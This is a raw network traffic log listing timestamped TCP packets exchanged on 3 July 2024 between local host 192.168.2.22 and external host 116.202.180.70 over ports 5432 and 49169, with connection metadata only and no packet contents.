Jul 3, 2024 02:22:31.236279964 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.236289978 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.236310959 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.236320019 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.240297079 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.240336895 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.240339994 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.240375996 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.240457058 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.240467072 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.240477085 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.240499973 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.240516901 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.240526915 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.240537882 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.240546942 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.240571022 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.240581036 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.241636038 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.247446060 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.247481108 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.247488976 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.247498989 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.247515917 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.247528076 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.247553110 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.247565031 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.247592926 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.247641087 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.247651100 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.247685909 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.248255968 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.248295069 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.248308897 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.248317003 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.248343945 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.248537064 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.248579979 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.248581886 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.248590946 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.248615026 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.248625994 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.248629093 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.248636961 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.248667955 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.252206087 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.252217054 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.252228022 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.252249956 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.252266884 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.252291918 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.252301931 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.252310991 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.252320051 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.252334118 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.252351999 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.252371073 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.262448072 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.262484074 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.262494087 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.262505054 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.262526989 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.262531042 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.262567997 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.262651920 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.262661934 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.262672901 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.262680054 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.262696028 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.262712002 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.280435085 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.280476093 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.280536890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.280545950 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.280555964 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.280565977 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.280575037 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.280576944 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.280586004 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.280596018 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.280596972 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.280616999 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.280635118 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.281240940 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.281281948 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.281282902 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.281291008 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.281301022 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.281316996 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.281341076 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.281728983 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.281738997 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.281754971 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.281764030 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.281769991 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.281774998 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.281784058 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.281800985 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.281800985 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.281814098 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.282433987 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.282450914 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.282460928 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.282474995 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.282491922 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.282502890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.282512903 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.282548904 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.289076090 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.289115906 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.289115906 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.289125919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.289141893 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.289159060 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.289169073 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.289176941 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.289179087 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.289211035 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.289241076 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.289283037 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.343394995 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.348263979 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348329067 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.348361015 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348371029 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348380089 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348408937 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.348421097 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348422050 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.348432064 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348440886 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348455906 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348464012 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.348468065 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348494053 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.348500967 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.348797083 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348838091 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.348876953 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348886967 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348902941 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348912954 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348917961 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.348922968 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348932028 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348934889 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.348942995 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348953962 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.348958969 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.348978043 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.348992109 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.349714994 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.349760056 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.349802971 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.349812031 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.349822044 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.349839926 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.349844933 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.349853992 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.349858999 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.349864006 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.349879026 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.349888086 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.349905968 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.349920988 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.350584984 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.350608110 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.350619078 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.350630045 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.350652933 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.350680113 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.350689888 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.350699902 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.350708961 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.350719929 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.350719929 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.350730896 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.350744963 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.350765944 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.351593971 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.351603985 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.351613998 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.351639032 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.351655960 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.351715088 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.351723909 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.351733923 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.351744890 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.351753950 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.351756096 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.351767063 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.351777077 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.351788044 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.351813078 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.352518082 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.352559090 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.352587938 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.352603912 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.352615118 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.352622986 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.352627993 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.352632999 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.352642059 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.352646112 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.352652073 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.352668047 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.352677107 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.352699041 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.353399992 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.353463888 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.353465080 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.353502035 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.454369068 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.461257935 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461268902 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461281061 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461308002 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.461333990 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.461401939 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461416006 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461425066 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461442947 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.461445093 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461467028 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.461468935 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461483002 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.461487055 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461512089 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.461512089 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461529970 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.461530924 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461544991 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.461549044 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461566925 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.461570024 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461582899 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.461587906 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461606979 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.461625099 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.461697102 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461739063 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.461977959 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.461987972 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462001085 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462023973 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462025881 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.462035894 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.462043047 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462059021 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.462059975 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462076902 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.462080002 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462096930 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.462097883 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462116003 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.462116957 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462133884 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.462135077 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462152004 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.462155104 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462174892 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.462193012 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.462766886 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462778091 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462794065 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462810040 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.462815046 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462833881 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.462836981 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462846994 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.462888002 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.462939024 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462954998 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462964058 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462985992 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.462985992 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.463001966 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.463005066 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.463021040 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.463023901 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.463042021 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.463059902 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.463069916 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.463079929 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.463089943 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.463108063 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.463112116 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.463129044 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.463144064 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.463799000 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.463809013 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.463819981 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.463836908 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.463840961 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.463882923 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.463951111 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.463962078 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.463970900 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.463983059 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.463994026 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.464009047 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.464128971 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.464142084 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.464149952 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.464160919 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.464165926 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.464183092 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.464198112 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.464484930 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.464500904 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.464524031 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.464534998 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.468678951 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.468718052 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.469597101 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.469607115 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.469615936 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.469629049 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.469635010 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.469638109 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.469647884 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.469650984 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.469665051 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.469672918 CEST	49169	5432	192.168.2.22	116.202.180.70
Jul 3, 2024 02:22:31.469674110 CEST	5432	49169	116.202.180.70	192.168.2.22
Jul 3, 2024 02:22:31.469687939 CEST	49169	5432	192.168.2.22	116.202.180.70
